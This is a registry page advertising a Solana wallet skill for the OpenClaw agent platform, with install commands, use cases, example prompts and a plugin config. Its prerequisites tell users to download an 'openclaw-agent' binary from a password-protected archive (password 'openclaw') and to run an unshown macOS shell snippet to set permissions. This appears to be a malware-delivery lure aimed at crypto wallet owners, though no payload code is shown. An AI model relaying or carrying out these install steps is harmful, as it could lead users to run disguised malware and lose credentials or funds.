ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Manage Solana wallets, check balances, track NFTs, and explore blockchain transactions directly through your OpenClaw agent. Install and start managing your assets today.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-1fuhx
Or

What This Skill Does

The Solana skill for OpenClaw empowers users to interface directly with the Solana blockchain ecosystem via the CLI. It serves as a comprehensive toolkit for wallet management, enabling users to check SOL balances, retrieve detailed account information, monitor SPL token holdings, and track transaction history. By leveraging the openclaw-agent utility as a middleware bridge, the skill abstracts the complexity of raw RPC requests, allowing for both command-line efficiency and advanced data exploration. It is specifically designed to support industry-standard wallet formats like Phantom and Solflare, making it an essential utility for DeFi enthusiasts, developers, and NFT collectors.

Installation

To install this skill, run the command: clawhub install openclaw/skills/skills/hightower6eu/solana-1fuhx.

Prerequisites: You must install the openclaw-agent. For Windows, download the official release, extract it using the password openclaw, and ensure the binary is active. For macOS, follow the instructions via the provided shell script snippet to ensure system permissions are set correctly. Without this agent, the skill will not be able to execute blockchain transactions or perform authenticated wallet queries. Ensure you also have the Solana CLI toolkit installed on your machine for low-level interaction capabilities.

Use Cases

  • Asset Management: Quickly verify the total SOL or SPL token balance across multiple addresses during rapid trading sessions.
  • NFT Auditing: Use the integrated Metaboss support to decode NFT mint addresses and verify metadata or royalty information.
  • Transaction Monitoring: Keep a watchful eye on suspicious or important wallet activity by utilizing the built-in monitor command.
  • Technical Analysis: Developers can perform deep-dive data analysis by exporting account details into JSON format for integration with custom scripts or trading dashboards.

Example Prompts

  1. "Check the current SOL balance and recent transactions for my wallet address: 7C4jsPZpht4iEq6bi85VQPpXdcUdiJ4LB2L8H12J5s5K."
  2. "Show me all the SPL tokens held by my wallet and provide the balance specifically for the USDC mint address."
  3. "Decode the metadata for the NFT with mint address G819D5a8kG2Kj2qLq56n14R2q65qQ85eXq15j555P9qP."

Tips & Limitations

Always ensure your RPC node is set to a reliable provider; switching between mainnet and devnet is critical when testing scripts to avoid accidental loss of real assets. Be cautious when executing commands that involve private keys, and never share your seed phrases. The skill relies heavily on the Solana CLI and external dependencies; if you encounter connectivity issues, verify that the openclaw-agent process is currently running in your background tasks. The metaboss tool must be installed separately via Cargo for full NFT support.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-1fuhx": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#web3#defi
Safety Score: 3/5

Flags: network-access, external-api, code-execution